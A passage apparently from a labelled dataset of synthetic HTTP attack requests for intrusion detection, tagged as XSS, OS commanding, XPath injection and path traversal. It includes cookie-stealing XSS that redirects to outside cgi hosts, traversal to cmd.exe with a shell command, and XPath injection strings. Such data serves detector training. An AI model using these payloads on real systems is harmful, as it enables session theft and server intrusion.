Cookie: baeohBtFshlet1=76246;twhdoniH=e0cqdAxan(1esock_stream3;ed=nts7;faZTmR=44686;me5Tti=ecao;7jre=hr'
Cookie2: $Version="94"
Date: Fri, 06 Jul 07 10:53:32 GMT
ETag: "f-78hbGcyMFOKmfms"
Expect: tpfss
From: 5sny@toesr.uk
If-Modified-Since: Mon, 08 Sep 08 24:30:08 GMT
If-Unmodified-Since: Wed, 17 Mar 10 21:19:13 GMT
If-Match: "gyKNbR_I5KPfq01"
If-None-Match: *
If-Range: *
Max-Forwards: 61
MIME-Version: 6.3
Pragma: ee5rhcb='se'
Proxy-Authorization: artrps eibl=2ExpiAa
Authorization: Basic c29pZTplbHRxcmVN
Range: -8
Referer: /ees1.gif
TE: trailers,trailers,trailers
Trailer: Accept-Language
User-Agent: aevew (0NHQWNkGQM; r5aNMRS; 3_sPIM)
UA-CPU: StrongARM
UA-Disp: 576,409,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 953x2070
Via: 4.5 www.emhukO.tiff, FTP/7.8 www.ansa.tiff
Transfer-Encoding: compress
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 906 www.mgsdP.jpg "luEthgfredan" 
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 6608359
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49329
Start - Id: 44075
class: OsCommanding
GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+ HTTP/1.0
Host: 3.74.143.30:04592
Connection: ktosiqyo
Accept: */*
Accept-Charset: x-mac-cyrillic, euc-tw, cp-932;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 103.148.81.42
Cookie: 3ndrtsa4o=gcthLh0rtjarse
Cookie2: $Version="25"
Date: Sun, 14 May 06 03:11:38 UTC
ETag: W/".Z.c4.xeA3kSTWv"
Expect: 100-continue
From: eyde@enOee.biz
If-Modified-Since: Tue, 06 Feb 07 13:40:22 CET
If-Unmodified-Since: Wed, 27 Jul 05 20:03:15 GMT
If-Match: "4izoy@O-uWLf6iB"
If-None-Match: *
If-Range: "C1H9fyXqPdeZ7PAV4MsR"
Max-Forwards: 1
MIME-Version: 3.4
Pragma: r=hsrr
Proxy-Authorization: elsyeo wweq2teU=ecoga5u
Authorization: NTLM bXRzYXRuc2x0aDZ5b2FlM3M0YXQ0bnFsYWFpdzRtb2F3bnV5N294NW9laXJkaw==
Range: 20-
Referer: /sohozetH/mralo7l/noes.zip
TE: trailers,trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/8.6 (X11; U; Open BSD i386 0.1; gs-jn; rv:4.9.3) Gecko/86811974
UA-CPU: x86
UA-Disp: 6409,6413,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 4959x090
Via: 7.1 94.224.137.87, 1.3 www.ihyde.shtml, 9.4 47.50.23.59:6
Transfer-Encoding: deflate
Upgrade: unHis2/9.7, sDw/8.7
Warning: 247 www.hxe31.png "9a02iegsdsel8esiecoC" 
X-Forwarded-For: 180.219.181.140
X-Serial-Number: 388289600968011
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44075
Start - Id: 47088
class: XSS
GET /ntc6LaEmp/un5homeDOlk6w/yvewafsh/rD.htm?peimSina=18&ed=nMq&ietAoy=488039030&e6ltioUxIii8ata=%3Cimg+++src++%3D++++%22+toveartr+%3E+++%22+++++onmouseover%3D++%22++++%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.ites.com%2Fcgi-bin%2Fanstetde.cgi%27%2Bdocument.cookie%29%3B%5D++%22+%3E&ruiu3tthy=482147&Sh=7074027&essve=88958124 HTTP/1.0
Host: www.nyyqietthe.de:27629
Connection: iohuds
Accept: */*
Accept-Charset: iso-8859-2;q=0.2, windows-1250, iso-8859-1, windows-1252;q=0.7, x-mac-chinesetrad;q=0.9
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 4.100.87.145
Cookie: ightNeedzele=k;ntteh2n=794;OEQlQM=n8pelShoreersaeRs;est=h ;4JO2=tQaMot-zsENP;qWa6wwbtlaa=148071
Cookie2: $Version="958"
Date: Wed, 06 Apr 05 05:44:18 GMT
ETag: "2EHndP4BY08IR-_xWK"
Expect: 100-continue
From: he45tlh@5ely.uk
If-Modified-Since: Wed, 16 Jun 04 06:03:19 CET
If-Unmodified-Since: Sat, 30 Oct 04 02:04:04 GMT
If-Match: *
If-None-Match: "V9.i.iQXnMQ7R7p"
If-Range: Mon, 06 Nov 06 18:40:39 UTC
Max-Forwards: 5
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: NTLM RG1mM3NqbEVxZ29jZW1hdHJsOG9lYWlzZ2ZnY3R3YmhlT2VhZWh4MmU=
Authorization: Digest username="oDiirc"
Range: 8087-45811,698738-8731
Referer: http://www.ednsqthe.net/hmDekv/Threeied/4wcet.gz
TE: trailers
Trailer: Warning
User-Agent: bshhabELjodflnyhtT1e
UA-CPU: StrongARM
UA-Disp: 016,6175,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 389x1282
Via: 5.9 www.u7d6l.tiff:570, 5.7 www.EsdTiio.html:59
Transfer-Encoding: gzip
Upgrade: mwcnt/9.8, Dizwoq/2.8, rtnuoa/0.5
Warning: 097 105.248.59.21 "trypi" "Sat, 04 Jun 05 05:58:55 UTC"
X-Forwarded-For: 32.49.185.177
X-Serial-Number: 60697232
----: ------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 47088
Start - Id: 47309
class: XSS
GET /tLzFgcfh-y@e/a5Swils4hd39ethl/serontham4yrer/16a3_N./Ft7dnlhnp8sEipos/qs-/nWoplHZJC_bp5h4.exe?nol=89527938&evnoHodSeU1et0c=%3Cbody+++onload++++%3D+++%22%5Balert++++%28%27ocnn%27%29%3B%5D+++++%22+%3E&ne0=oshn&1yujgssnioni=hrteeu6jatm6khlb&utnhealgtLhtrlf=hMiN-NzHgAj&ealp0exnete=vineeval&eae=Aee5ttnaln&sswootPhabTeaus=7632&rxC3f=+eca%24iouk HTTP/1.0
Host: 1.121.167.16
Connection: keep-alive
Accept: audio/*, image/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: dTE-f9epwet, d-W3Ddedr;q=0.2, ocaset-40, a-frdL;q=0.7, r-nye1
Cache-Control: no-store
Client-ip: 34.95.18.244
Cookie: rrirRhRd=4gtp+o
Cookie2: $Version="659"
Date: Sun, 17 May 09 18:53:22 GMT
ETag: W/"kmh.JRxb6nN3qMqK1"
Expect: 100-continue
From: 7enano@rnreTe6ep.de
If-Modified-Since: Fri, 19 Feb 10 21:43:02 GMT
If-Unmodified-Since: Tue, 07 Jul 09 16:28:04 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 02 Dec 08 22:15:20 CET
Max-Forwards: 8367
MIME-Version: 0.1
Pragma: doodb1gc=En2gisp
Proxy-Authorization: Digest cnonce="izenb6"
Authorization: NTLM aDRpeWV1UGFzQmpoZTYxaWd5N2Vub2d3dXR0cm5TZWUyQXQ=
Range: 498-
Referer: http://hshz.it/o2meey6/mrocoh4/aeYmrec/oooRc/1tcof.cfm
TE: deflate,trailers,deflate
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.8 (Machintosh; U; PPC Mac OS X 9.9; ct-St; rv:1.0.6) Gecko/80525883
UA-CPU: Sparc
UA-Disp: 8442,560,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 5306x1733
Via: FTP/4.7 www.xrnji.gif:81
Transfer-Encoding: deflate
Upgrade: te4gye/2.3, elsad/9.1, hedM/8.6, a0ndP/0.7
Warning: 318 www.lawraii.gif:81 "spet7rfthtnscentm3" "Thu, 05 Aug 04 21:32:03 CET"
X-Forwarded-For: 46.124.140.98
X-Serial-Number: 126620
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47309
Start - Id: 49559
class: XPathInjection
GET /ep@r5YOYV3nHrPkT/hr/nauD.sh?od=tw7&ona=539324195&sj4urnhty2ngUe=012+++or++++1%3C+++++casio%2Fts%2Fitnalc%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D3%5D++++or++++08%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&Tejl8fnpheirvV=641&taU5=sma+snzimg&pNv@.jyhuW3=mleehdib&1attiur7owr8=mbgsoundo%7Et HTTP/1.1
Host: 241.202.44.135
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.1, gzip;q=0.2
Accept-Language: *;q=0.0
Cache-Control: min-fresh=9017
Client-ip: 69.118.218.13
Cookie: ssitevxecoei=jrEnc0ojoie1n;Etfoahfbsdiychz=e0 mhsaifNs0passthru2s
Cookie2: $Version="79"
Date: Tue, 20 Jan 09 07:54:41 UTC
ETag: "XzC6Z-Vy8j2n97GIJ"
Expect: 100-continue
From: swnuaoul@meaPt.org
If-Modified-Since: Sat, 26 Jun 04 24:57:33 UTC
If-Unmodified-Since: Wed, 12 Jul 06 08:52:06 CET
If-Match: "gSfVBjMCwIxcO2KBCV"
If-None-Match: "kEWDeLnT.B7v3YOoK"
If-Range: "Jzovszu6u9MAiD@_x2"
Max-Forwards: 756
MIME-Version: 0.7
Pragma: dowadlt='aeenaloe'
Proxy-Authorization: 9a2ilt dswfus7=iredewem
Authorization: Digest nonce
Range: 5151-28,-30112,9663-34
Referer: http://www.enetb.ch/hn8nEls/xbd1.mdb
TE: trailers,gzip;q=0.4,deflate;q=0.6
Trailer: Accept
User-Agent: nn43pnaeole
UA-CPU: Sparc
UA-Disp: 2924,8513,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 9192x115
Via: 8.0 www.fdlOhZh.jpg
Transfer-Encoding: deflate
Upgrade: aasauh/5.2
Warning: 622 40.205.215.175:58 "enti0naeoeboeeo" 
X-Forwarded-For: 17.226.135.24
X-Serial-Number: 5637590848505362302
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49559
Start - Id: 49824
class: XPathInjection
GET /qPj@3kyLpasswdF/34MfsN4ZdNo0/4AlCP7U03HYd/n-jtPPe0u33ypZ9OUFWT/gigeaneltzt/rt1mUDshaBefh71s.dll?4t3dsyhes=atetcHs&edoaa=4&a2eeeeiaerqrb=reNe%27++or+1%3C+c%2Fu5a%2Fbereuh%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D5%5D+or++++%27nEtuEtn%27+++%3D++%27&jAjb5c=s&wa6eS0tnatcn=imrtter&fxeinnseei=xisam%26Owe6ltois&oueeriynuenh4=67&mh=ccWcC2Gm457&sr9r=aswp-&yiaed0ewTEgisi=Tgtni&wY2HPo_v=skJU2BwVgM&5eseirzinr9t2=hyFjgFSVVW&tubdr3s=%28+ HTTP/1.1
Host: 80.29.156.227
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: x-mac-korean;q=0.2, x-mac-hebrew;q=0.4, x-mac-turkish;q=0.5, x-mac-arabic;q=0.9, x-mac-turkish
Accept-Encoding: *;q=0.2
Accept-Language: itnl-ibo;q=0.1
Cache-Control: max-age=280
Client-ip: 113.253.116.24
Cookie: DSTN1igbjo=5eO4RReeIoia;fsqt=72475
Cookie2: $Version="7"
Date: Tue, 01 Jun 04 10:47:38 UTC
ETag: "zy_qieYB8jV9UgdeU3V"
Expect: 100-continue
From: noamdhg@Dea3h8.biz
If-Modified-Since: Sun, 09 Sep 07 06:57:46 CET
If-Unmodified-Since: Sat, 18 Dec 04 11:43:13 GMT
If-Match: "ucecuX_RhmYNzx9e07F"
If-None-Match: "oVNA9rVlIhP3cgwZ"
If-Range: Thu, 31 Dec 09 05:37:45 UTC
Max-Forwards: 8888
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Basic ZVJhcnJsQTppc3Blbw==
Authorization: Digest algorithm=MD5
Range: 146069-77725,-1146
Referer: /iio7welj/c3raurc/eNoVty3n/a9a9/ihan.css
TE: chunked
Trailer: Via
User-Agent: Mozilla/0.9 (X11; U; Open BSD i386 0.3; or-nn; rv:0.1.4) Gecko/13171239
UA-CPU: MIPS
UA-Disp: 662,518,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 172x6984
Via: HTTP/3.6 80.202.75.241
Transfer-Encoding: compress
Upgrade: oega/2.1, oaa/9.5, pharkT/6.9, nba/7.2, nha/2.3
Warning: 539 163.222.151.131 "oqahsnbhdol" 
X-Forwarded-For: 102.140.21.48
X-Serial-Number: 684744620
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49824
Start - Id: 47831
class: XSS
GET /scnutaEishtl2nmISlw/lThioB0/2aoet/QY.I/2eBzont6ta1e/v9h3tDBW2yMTeLh3-.js?cEo8l=nimntIseH0mt3patld&doe=32725&deed1a5zzAsi=hlep7hsxqhluaam0e&enyeekzr=etc9piT&ne0l=%3Cdiv++style++++%3D++%22binding%3A+++++url%28%5Bhttp%3A%2F%2Fwww.etstro.com%2Fscript%2Fnte.cgi%5D%29%3B+++%22++%3E&d3xhJtC=o7nd HTTP/1.0
Host: 31.81.134.82
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1253;q=0.9, us-ascii;q=0.9, euc-kr;q=0.3, x-mac-arabic;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: max-stale
Client-ip: 106.65.144.196
Cookie: dmMs4=ydrophduTsylts1\g;iieItinrdtohds=sene;lM=615410;ssigotaocae9=naa
Cookie2: $Version="540"
Date: Sat, 21 Aug 04 05:57:11 GMT
ETag: W/"OurwtpibD7A0noXC"
Expect: 100-continue
From: easla@ssNseiT.it
If-Modified-Since: Sat, 07 Jun 08 19:03:11 GMT
If-Unmodified-Since: Thu, 20 Dec 07 23:46:56 GMT
If-Match: *
If-None-Match: "m1JK9pR8yar7L562uPv8"
If-Range: Sun, 05 Apr 09 17:10:34 CET
Max-Forwards: 095
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: ae9de sesszy=lt9eEk7
Authorization: Basic c29MVFRUczE6YTdybWM=
Range: 44-,80-
Referer: /ei3vao.tar
TE: deflate,chunked,trailers
Trailer: TE
User-Agent: Mozilla/0.3 (Machintosh; U; PPC Mac OS X 8.1; eh-hs; rv:4.5.5) Gecko/38397026
UA-CPU: MIPS
UA-Disp: 162,931,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 931x0551
Via: HTTP/5.8 www.Bjtkamn.css
Transfer-Encoding: gzip
Upgrade: etm/8.2
Warning: 325 www.lmdi.jpg "lP9i9" 
X-Forwarded-For: 240.35.1.196
X-Serial-Number: 155809
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 47831
Start - Id: 48177
class: XSS
POST /tf-Kqr/utG@dk-jWMClAX1bl-/7IuLjtVR1/s75B4mtg6il-n3v/aestiTnaebnI/Hq6rp/ucBuomLe.mdb? HTTP/1.1
Content-Length: 338
Content-Language: p0afoia,tni,8
Content-Encoding: deflate
Content-Location: /nsnt.php
Content-MD5: RWJpa3JsdHRrdGV3NVBlYw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 12 Nov 06 16:51:52 GMT
Last-Modified: Fri, 26 Sep 08 17:04:41 GMT
Host: 226.147.210.40
Connection: neir2sg
Accept: image/png
Accept-Charset: iso-8859-5;q=0.7, iso-2022-jp, iso-8859-6;q=0.4
Accept-Encoding: 
Accept-Language: e-d3dI, rtry-hnZ7s
Cache-Control: no-cache
Client-ip: 148.144.232.153
Cookie: ntpx44=o w$ip&tnib9qF;1vFdeleteyZ=hnsgs;Fahey9ntC5hhlo=0664062;tRaaixfiseft=wliboulzmboot.inisWeTlSea2wm;or20hearaosso=sxrtsobxtis0ie8s
Cookie2: $Version="4"
Date: Sat, 28 May 05 09:18:04 UTC
ETag: W/"aCt-nUJOaBaVXz1h"
Expect: 100-continue
If-Modified-Since: Fri, 27 Apr 07 11:06:59 GMT
If-Unmodified-Since: Mon, 23 Aug 04 24:40:09 UTC
If-Match: "aw2lIMZhbKvM4TpuIS6"
If-None-Match: *
If-Range: Thu, 04 Oct 07 01:12:33 GMT
Max-Forwards: 1843
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: Digest username="Nbcsty"
Authorization: Digest nc=11B11BAE
Range: 252-,4-47,9983-
Referer: http://Gmtraer.gov/eaural/yOoaheIa.jsp
TE: deflate,trailers,chunked;q=0.6
Trailer: Range
User-Agent: <script    >alert  (  "    vaea4ralyyeeelpo.doTsx")</script   >
UA-Disp: 7787,6372,16
UA-Color: color8
Via: HTTP/4.8 76.153.226.42:276
Transfer-Encoding: gzip
Upgrade: eMe/4.0, mna/3.4
X-Forwarded-For: 203.248.86.3
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

lzttiaSEc=lattd&lE43oc0uiic=557386539&enm7ga0qEht03E=tqRqVnc3G4&ftnbanqsqsraanx=htpass/9services\r&rrtokge=iZ_K&mkfe0ynt=mee\isc5ghn3aoptlnt&n9cd=tiodttelnetmetasisUa&ouewoenilahrEde=m@SkbbLcC&fenhrynwrntomcx=878twt %jallautoexec b'e&rtaytwe=7312749&cIyAold2lxxs=ynKtyt27V&et8paesrqIU=aompNxno&tLOt=asfloq&nodexVG=esro&qeaJ=ct

End - Id: 48177
Start - Id: 43689
class: OsCommanding
GET /scripts/..�../..�../mssql7/install/pubtext.bat" & dir c:\ .exe? HTTP/1.1
Host: 221.190.175.2
Connection: eosi7xlN
Accept: video/*, audio/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: oA7o-nlD;q=0.9, clhoTaba-a;q=0.5, loue-eeeir, Rnf-hebfpnp
Cache-Control: max-stale
Client-ip: 224.58.43.189
Cookie: pqtqeOtm5u1fta=438934;frctfnL=o\5iyun;w;stuesheGv8oa=74746;rdmto=i;Lmvo=ageh5tpcn
Cookie2: $Version="4"
Date: Wed, 18 Nov 09 03:57:50 CET
ETag: "Ypk8OsVE4.PySPp"
Expect: kkgrt5
From: o68nO@tetn70i.cz
If-Modified-Since: Thu, 06 Sep 07 22:27:26 CET
If-Unmodified-Since: Sun, 01 Oct 06 06:42:34 GMT
If-Match: "mJJG3z@q5TiwxT8jCP@"
If-None-Match: *
If-Range: "Q2gRfeoVn9h94TAk2mu"
Max-Forwards: 0
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: csat8 fle0=tohc
Authorization: Digest algorithm=MD5
Range: 0932-655,7-822597,-7
Referer: /4otrea/4lmixaeA/8tTOdpeh/nsoWfir.pl
TE: chunked,trailers,chunked
User-Agent: hmohledwssrso
UA-CPU: StrongARM
UA-Disp: 0760,6921,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 827x275
Via: 1.1 55.93.89.51
Transfer-Encoding: deflate
Upgrade: as8/8.8, mad/2.6, pEyuj/1.9, o5a8/8.7, ewmi2m/5.2
Warning: 965 www.lhcrhue2.jpeg "khnjidedehslccnwsp" "Tue, 25 Jan 05 20:48:31 UTC"
X-Forwarded-For: 51.55.191.62
X-Serial-Number: 181822248668347
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43689
Start - Id: 49738
class: XPathInjection
GET /8rtsame94srbfEe1s/bCheoert/aEcr/zi/3etmyos/eV6cbrf95/zanpsedEse/d-Oe/@Uc.php3?metalW@Sy=2&Ewou9bg1=ahioualEon3y&ikoal=1+++or++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++%7C+++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++or+++828%3D&BumiBq9_x=yaccept2ddreb+in%40o0&9HhVZrS8P5_Z=77824 HTTP/1.1
Host: www.Xerdphbsa4.cz:80
Connection: close
Accept: video/quicktime;q=0.2, text/*, text/*;q=0.9
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: 6ror7niu=nLt
Client-ip: 24.134.122.55
Cookie: eeit8n=rood;cc=snBp2P6G;earatf=jJu;Nd=fxreplacehedlnadaotnea;XlERq=7AAe0az60s
Cookie2: $Version="05"
Date: Tue, 26 Oct 04 07:00:08 CET
ETag: "-Dc1ZeBRZlf3FwUe"
Expect: 100-continue
From: ejeriHt@tvteeteb.fr
If-Modified-Since: Sun, 25 Jul 04 06:35:32 GMT
If-Unmodified-Since: Wed, 21 Feb 07 09:49:31 GMT
If-Match: "dQEuefFbIxp4tn.NinJ"
If-None-Match: "-3FzpY@tOfQqwYOBqG"
If-Range: "l8UmGJBfikP0i.2"
Max-Forwards: 661
MIME-Version: 0.1
Pragma: e='iIwm'
Proxy-Authorization: Basic aXd5RWRhbmE6OHFuOGVuNGU=
Authorization: Basic aXRhc2xmMm46NGJhMw==
Range: -37003,-5,-1
Referer: http://www.hL22nm.be/e5sgf/emt1Odon/aefvawh/ljmuv.txt
TE: trailers,gzip;q=0.9
Trailer: Connection
User-Agent: Mozilla/4.6 (Windows; U; WinNT 3.6; sw-aq; rv:8.4.9) Gecko/75421230
UA-CPU: x86
UA-Disp: 3953,5444,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 4653x522
Via: 5iig0/3.5 www.ItaTandp.css:8, FTP/7.9 77.1.26.167
Transfer-Encoding: gzip
Upgrade: rsmt7a/2.2, ysy/1.0
Warning: 623 www.Cxer.gif "wenr" 
X-Forwarded-For: 91.230.146.163
X-Serial-Number: 9273829516846529
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49738
Start - Id: 44685
class: PathTransversal
POST /s5w.17aT/iHF85om/aeostuaihdsterntot/tCLX5SgR_uT/t-nqtoAEg/teaPtdEaroXoene4/xNobjectkSfpbJl_mFXB/mmsnxksrewil/uxtvmBTp1AcOjnY8U-/3riaxuuBbt/bzd.gif? HTTP/1.0
Content-Length: 220
Content-Language: mTia,l
Content-Encoding: compress
Content-Location: http://www.rehd1e.it/rotn9H/setnHA.css
Content-MD5: b2VncmJ0Z2V0b2VxYnRpcw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 27 Sep 08 04:18:23 UTC
Last-Modified: Wed, 01 Aug 07 15:45:45 CET
Host: 173.96.25.140
Connection: keep-alive
Accept: application/zip
Accept-Charset: utf-7, iso-2022-jp, ks_c_5601-1987, x-mac-arabic;q=0.7
Accept-Encoding: *;q=0.8
Accept-Language: ssfn2-kne1;q=0.8
Cache-Control: no-cache
Client-ip: 209.36.114.208
Cookie: bmglfmUhnlI=erDD3;hitcsAwRhye=Dtn4j fg;wzisati73p4gsr=38231755
Cookie2: $Version="204"
Date: Mon, 09 Aug 04 16:37:52 GMT
From: lhlpdrcp@ehieTi.gov
If-Modified-Since: Wed, 02 Jan 08 01:23:29 CET
If-Unmodified-Since: Mon, 05 Feb 07 12:42:57 CET
If-Match: "xnwomlPF7ti7L96A"
If-None-Match: "u72unQyI2RbxM0ErdJ"
If-Range: *
Max-Forwards: 7225
Pragma: fi54='di'
Authorization: Digest nc=F2bf69C0
Range: 2168-,8-1607,73-
Referer: /f6pux/anfei5I/alrf.html
TE: trailers,gzip,deflate
Trailer: Cache-Control
User-Agent: r0mdh9dfnm (eT60dCPjK)
UA-CPU: StrongARM
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 562x3540
Via: hanpe/3.4 www.nFerirey.html, Ahi/0.3 231.207.250.1
Transfer-Encoding: tmdrac; pDl6ieer=tuge
Upgrade: 2dgtes/0.6
Warning: 690 www.maefe.png:3036 "oEisin22ih1tenabt" 
X-Forwarded-For: 121.97.240.234
X-Serial-Number: 175251
----: ------------------------

sm=801529&8nOd3ruwi=iueoir2wwcnIn&LELwS0PcEftp9H=doc( file:///c:/ch/Nt4htwg4.xml)&5ZlBmgGB=9et&hEiaGtiue=v3jK4jow-&dHr1=799&YKlocationMK4YXUj=slncvvo &a94Mmevsaens=es-yG&EAt2saEet4nmi=iD6l65PITB&dm=homs

End - Id: 44685
Start - Id: 49701
class: XPathInjection
GET /lezFuuV/4oICv6GVLxWJ/ouneTene4tiaye.png?anxnun02tnintn=8Kt0ns%2FeaaA%2Fty%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D723%5D+++or+++++%27btm%27%3D%27&q7enbnEfysne3=%3Bn HTTP/1.0
Host: 244.154.86.207
Connection: gt8R2scp
Accept: */*;q=0.9
Accept-Charset: windows-1253, iso-8859-9;q=0.6
Accept-Encoding: identity, compress, identity;q=0.5
Accept-Language: eveem-oian, og-gmrNem
Cache-Control: only-if-cached
Client-ip: 251.247.9.85
Cookie: Teftgoaelojrax=9tNhutrv;aeTtanieqwrdi=giXCF_tvV8;angse=ly7-Yd-4;ualaqkGn7br24=20264302
Cookie2: $Version="4"
Date: Sat, 15 Sep 07 17:02:42 UTC
ETag: W/"s3klw_r.kke6tQh"
Expect: iazqtree
From: tmHtei@9Eaetn4.de
If-Modified-Since: Mon, 04 Jan 10 03:07:35 GMT
If-Unmodified-Since: Sun, 04 Jan 04 11:49:28 UTC
If-Match: "a@y2@-2rgEL840pQ"
If-None-Match: *
If-Range: Wed, 31 Jan 07 07:51:14 CET
Max-Forwards: 30
MIME-Version: 8.1
Pragma: astao5rF=neeiei
Proxy-Authorization: Digest uri=http://ne8ihAoe.gov/rosa/iAser/drnUkate.aspx
Authorization: Digest nonce
Range: -394122
Referer: http://kp032r.com/oCisio.gz
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: l2xF_UaJum http://www.es0Hs.gov
UA-CPU: StrongARM
UA-Disp: 2722,5111,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 6094x1402
Via: 9.1 www.feser.html, 9.6 www.e6nzikeh.tiff, abav/6.5 www.neerne.html
Transfer-Encoding: s9tetd
Upgrade: ierniu/6.4, ytteh/9.3, ahoito/8.8
Warning: 928 www.sea4hf7.png:6529 "guetn6bIulNebhuhnEd" "Fri, 08 Apr 05 24:10:56 UTC"
X-Forwarded-For: 76.177.20.101
X-Serial-Number: 58499118
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49701
Start - Id: 48194
class: XSS
PUT /5ohatip9aahtoI/t4m/eP/lMz-pRZ1.A.Lp/n9@OaSDHFG.jpg? HTTP/1.0
Content-Length: 140
Content-Language: Deice6a,1l
Content-Encoding: gzip
Content-Location: http://ahbTi.cz/9rsee/Slrorr.ace
Content-MD5: c2VodmJvcmhkbFllMzIyaw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 23 Jan 08 18:52:02 CET
Last-Modified: Tue, 08 Jul 08 24:20:59 CET
Host: 24.228.102.189
Connection: uae8ie5e
Accept: application/*
Accept-Charset: iso-8859-8;q=0.3, iso-8859-3, windows-1258
Accept-Encoding: <<script>[document.location.replace    ('http://www.chilne.com/cgi-bin/llstalieic.cgi'+document.cookie);]</script >
Accept-Language: oeow27r-rmode, rsEmcad-osiee
Cache-Control: max-stale
Client-ip: 91.99.177.135
Cookie: t8oeabdlejctt=-n;mltWtnj=)1|iymo\perlwsm|esa;8ces=wcuGV_cMjGz;hsoL=e\Aan
Cookie2: $Version="86"
Date: Fri, 13 Jun 08 07:57:01 CET
ETag: W/"Jexh6JUi9RPoL60oN"
Expect: 100-continue
From: yeonrndi@ndape.biz
If-Modified-Since: Fri, 09 May 08 02:45:49 GMT
If-Unmodified-Since: Sun, 24 Jul 05 03:33:33 GMT
If-Match: *
If-None-Match: "JSRZ379HsDppnyV4"
If-Range: Wed, 04 Feb 04 01:30:34 GMT
Max-Forwards: 465
MIME-Version: 4.6
Pragma: no-cache
Authorization: NTLM Z2FJaTZueWx3cm5jZWV0aXQ4ZXRMbmFweWl1c0Rpdm5zeHg=
Referer: /eopS9/2lenadr/xmoder/motl/PtetTw.swf
TE: trailers,trailers
Trailer: If-Range
User-Agent: ndjan (mw.nqYAc1x; 2FuI5VbT; t0cEqUX; uItbdhCFze; bsEotXy_l)
UA-OS: Mac OS X
UA-Pixels: 9098x7703
Via: FTP/1.6 www.tvctldon.gif:00652
Transfer-Encoding: deflate
Warning: 376 www.tr4on.jpeg "m7aaREuTTovptbolar" 
X-Forwarded-For: 251.96.98.120
X-Serial-Number: 340888141293
----: -------------

l7e4c=5294&anetcatWz=HAalb1veag8tiis&re8eetos2l4ci=rshqovee&ui9leg=fautoexecS7wiaekh1&s5Inpata9=tGjwcdixxH&vveaNtitese=)62&pmAer1ir@o9

End - Id: 48194
Start - Id: 48158
class: XSS
GET /_optftpd9Pv_CHxnulltsam.php?xD8xenIGr=17934&th3ioNica6rix=t7iA&ELuwnpmdyeao=a0%40&.sw7SNNEj2=%3C%21%5BCDATA%5B%3C%21--%5D%5D++%3E%3Cscript%3E%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.aric.com%2Fcgi-bin%2Fansetaolar.cgi%27%2Bdocument.cookie%29%3B%5D%2F%2F--%3E%3C%2Fscript%3E&0OdfnhomeaP-tI=ttelnet4%2Bc%3Ctm%3E+e0%26%2Ftrg&iDtt8utOfekUPs=noo0exzwnd&ch4includeSWbselect=uOxL09u5UZy- HTTP/1.0
Host: www.q44bcetaA.ch:281
Connection: close
Accept: audio/x-wav;q=0.6, image/jpeg
